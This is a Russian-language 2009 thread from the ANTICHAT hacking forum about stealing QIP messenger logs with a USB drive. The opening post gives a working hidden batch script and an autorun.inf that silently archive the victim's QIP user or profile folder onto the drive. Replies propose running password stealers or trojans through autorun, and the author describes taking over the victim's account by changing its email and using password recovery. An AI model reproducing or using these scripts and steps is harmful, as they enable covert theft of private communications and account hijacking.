ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Как с помощью USB Flash украсть логи QIP ? |
26.03.2009, 15:10
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Как с помощью USB Flash украсть логи QIP ?
Что для этого нужно?
1 Создать файл zzz.bat с следующим текстом
@Echo off
c:
chdir C:\Program Files\QIP\Users
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
del users.rar > nul
где
@Echo off.......скрывает визуальный процес копирования
C:\Program Files\QIP\Users.......папка которую нада потянуть
g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
copy users.rar g:\123 > nul.......адрес куда тянем
del users.rar > nul.......удаляет созданый архив
если буква флеш диска не извесна можна нарисовать несколько вариантов
@Echo off
c:
chdir C:\Program Files\QIP\Users
e:\rar.exe a -r users > nul
copy users.rar e:\123 > nul
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
h:\rar.exe a -r users > nul
copy users.rar h:\123 > nul
del users.rar > nul
2 Создаем файл autorun.inf с текстом
[autorun]
ShellExeCute="zzz.bat"
3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR
4 Создаем папку с названием 123
5 Поместить это все 4 файла в корень флешки и сделать скрытыми.
PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
Буду рад если кому пригодится
источник:http://qiq.ru/26/03/2009/information/116842/kak_s_pomoschju_usb_flash_ukrast_logi_qip.html
PS:По моему интересный способ.
================================================== ===========
Для тех у кого путь логов теперь тут C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles:
@Echo off
c:
chdir C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles
g:\rar.exe a -r users > nul
copy Profiles.rar g:\123 > nul
del Profiles.rar > nul
видео
Последний раз редактировалось L I G A; 28.03.2009 в 16:11..
|
|
|
26.03.2009, 17:31
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 34
Провел на форуме:
276020
Репутация:
18
|
|
Лучше автораном запустить какую-нибудь прогу, ворующую пароли (помню были такие, которые через командную строку работали и сохраняли все пассы в файл) или, уж что там мелочиться, троян сразу.
Есть один досадный недочет, который опытный пользователь сразу обнаружит: по клику на диске запустится бат файл, но сам диск не откроется, хоть ты закликайся.
Ну и еще одно но - пользователи TotalCommander'a пролетают...
|
|
|
|
26.03.2009, 19:16
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от Dr.Gonzo
или, уж что там мелочиться, троян сразу.
Антивирус ругаться начнет.
|
|
|
|
26.03.2009, 19:32
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 98
Провел на форуме:
1543613
Репутация:
22
|
|
баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте
Последний раз редактировалось HellXi; 26.03.2009 в 19:39..
|
|
|
|
26.03.2009, 20:03
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от HellXi
баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте
стащю папку юзверс себе на машину ,и зайду в квип через его учетку,единственное что я не смогу - узнать пасс,в файле config.ini потому что квип постоянно меняет алгоритм шифрования.Но его можно узнать зайдя через эту учетку и ввести в данные свой email адрес, а потом воспользоваться системой напоминания пароля на соответствующих официальных сайтах icq или aim.
Последний раз редактировалось L I G A; 26.03.2009 в 21:02..
|
|
|
|
26.03.2009, 20:10
|
|
Познающий
Регистрация: 14.02.2009
Сообщений: 31
Провел на форуме:
73281
Репутация:
5
|
|
зачем изврат, если есть доступ к компу, идешь и воруешь логи в наглую, желательно без палева  |
|
|
|
26.03.2009, 21:55
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
ТС! Это действительно было на ачате! Кажется не в разделе аси а в статьях (точно я не помню). Ссылку я сейчс на тему искать не буду... но если хочешь то найду  |
|
|
|
26.03.2009, 22:08
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
путь логов теперь тут
C:\Documents and Settings\Admin\Application Data\QIP\Profiles
|
|
|
|
28.03.2009, 16:13
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
из-за частых вопросов снял видео.
|
|
|
|
28.03.2009, 16:29
|
|
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942
Репутация:
350
|
|
согласен... бантик самое лучшее средство... я так хистори с асекю тырю.... пишеш 5 строк... зато доволен во всю=)
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
